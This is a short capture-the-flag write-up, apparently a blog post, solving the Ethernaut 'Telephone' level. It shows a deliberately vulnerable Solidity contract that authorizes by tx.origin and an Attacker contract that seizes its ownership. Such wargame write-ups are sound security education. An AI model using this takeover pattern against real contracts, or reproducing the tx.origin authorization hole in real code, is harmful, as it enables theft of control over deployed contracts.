Ethernaut: 4. Telephone

erhant

Erhan Tezcan

Posted on July 16, 2022

Ethernaut: 4. Telephone

Play the level

// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

contract Telephone {
  address public owner;

  constructor() public {
    owner = msg.sender;
  }

  function changeOwner(address _owner) public {
    if (tx.origin != msg.sender) {
      owner = _owner;
    }
  }
}
Enter fullscreen mode Exit fullscreen mode

The tx.origin is the address that creates the transaction, and msg.sender is the sender of the current message. As such, tx.origin == msg.sender is true if message sender is an ethereum account; or false if the message sender is a contract. So, we want tx.origin != msg.sender to become the owner of the target, we just need to write a contract and call that function.

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

interface Telephone { 
  function changeOwner(address _owner) external;
}

contract Attacker {
  Telephone telephoneTarget;

  constructor(address _target) {
    telephoneTarget = Telephone(_target);
  }

  function pwn() public {
    require(msg.sender == tx.origin, "Who is attacking? :D");
    telephoneTarget.changeOwner(tx.origin);
  }
}
Enter fullscreen mode Exit fullscreen mode
💖 💪 🙅 🚩
erhant
Erhan Tezcan

Posted on July 16, 2022

Join Our Newsletter. No Spam, Only the good stuff.

Sign up to receive the latest update from our blog.

Related

Ethernaut: 27. Good Samaritan
solidity Ethernaut: 27. Good Samaritan

September 20, 2022

Ethernaut: 25. Motorbike
solidity Ethernaut: 25. Motorbike

July 16, 2022

Ethernaut: 0. Hello Ethernaut
solidity Ethernaut: 0. Hello Ethernaut

July 16, 2022

Ethernaut: 26. Double Entry Point
solidity Ethernaut: 26. Double Entry Point

July 16, 2022

Ethernaut: 12. Privacy
solidity Ethernaut: 12. Privacy

July 16, 2022